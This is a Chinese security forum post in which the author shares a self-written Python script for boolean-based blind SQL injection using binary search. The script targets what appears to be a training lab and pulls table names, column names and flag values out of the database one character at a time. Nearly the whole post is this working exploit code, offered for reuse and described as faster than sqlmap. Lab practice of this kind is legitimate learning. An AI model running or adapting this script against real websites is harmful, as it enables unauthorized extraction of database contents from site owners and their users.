论坛首页 > 技术文章投稿区 > 技术文章

基于二分法的sql布尔盲注脚本

kanjin · 发表于 2021-02-03 21:45:11 · 技术文章

代码写的很潦草，自用保存。但是速度比sqlmap快多了。
`

import requests
url2="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}"
url3="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}"
def table_name(url2,url3):
    strstr=""
    j = 1
    while(True):
        min=0
        max=122
        i=0
        flag=1
        flag1=2
        while(True):
            i+=1
            mid=(max+min)//2
            pon=requests.get(url2.format(j,mid)).text
            if(pon.find("有数据")==-1):
                max=mid
                if(i%3==0):
                    flag=mid
                else:
                    flag1=mid
                if(flag1==flag):
                    print("结束")
                    return strstr
            elif(requests.get(url3.format(j,int(mid+1))).text.find("有数据")!=-1):
                #print("匹配了"+str(i)+"次")
                print(chr(mid+1),end="")
                strstr+=chr(mid+1)
                j+=1
                break
            else:
                min=mid
url4="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='loflag'),{},1))>{}"
url5="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='loflag'),{},1))={}"
def column_name(url4,url5):
    columnName=""
    j=1
    while(True):
        max=122
        min=0
        i=0
        flag=1
        flag1=0
        while(True):
            i+=1
            mid=(max+min)//2
            if(requests.get(url4.format(j,mid)).text.find("有数据")==-1):
                max=mid
                if(i%2==0):
                    flag=mid
                else:
                    flag1=mid
                if(flag==flag1):
                    return columnName
            elif(requests.get(url5.format(j,mid+1)).text.find("有数据")!=-1):
                print(chr(mid+1),end="")
                j+=1
                columnName+=chr(mid+1)
                break
            else:
                min=mid
def flag(columnList):
    url5 = "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat({}) from loflag),{},1))>{}"
    url6 = "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat({}) from loflag),{},1))={}"
    for l in columnList:
        Flag=""
        j = 1
        flag = 1
        flag1 = 0
        while (True):
            max = 122
            min = 0
            i = 0
            if (flag == flag1):
                break
            while (True):
                i += 1
                mid = (max + min) // 2
                if (requests.get(url5.format(l,j, mid)).text.find("有数据") == -1):
                    max = mid
                    if (i % 2 == 0):
                        flag = mid
                    else:
                        flag1 = mid
                    if (flag == flag1):
                        print(Flag)
                        break
                elif (requests.get(url6.format(l,j, mid + 1)).text.find("有数据") != -1):
                    print(chr(mid + 1), end="")
                    j += 1
                    Flag += chr(mid + 1)
                    break
                else:
                    min = mid
if __name__=="__main__":
   #str= table_name(url2,url3)
   #print(str)
   #columnName=column_name(url4,url5)
   columnName="Id,flagloId,flaglo"
   columnList=columnName.split(",")
   print(columnList)
   flag(columnList)

`

运行截图

`

用户名	金币	积分	时间	理由
veek	50.00	0	2021-02-04 15:03:28	有代码注释和思路就更好了~

打赏我,让我更有动力~

0 条回复 | 直到 2021-2-3 | 1155 次浏览

登录后才可发表内容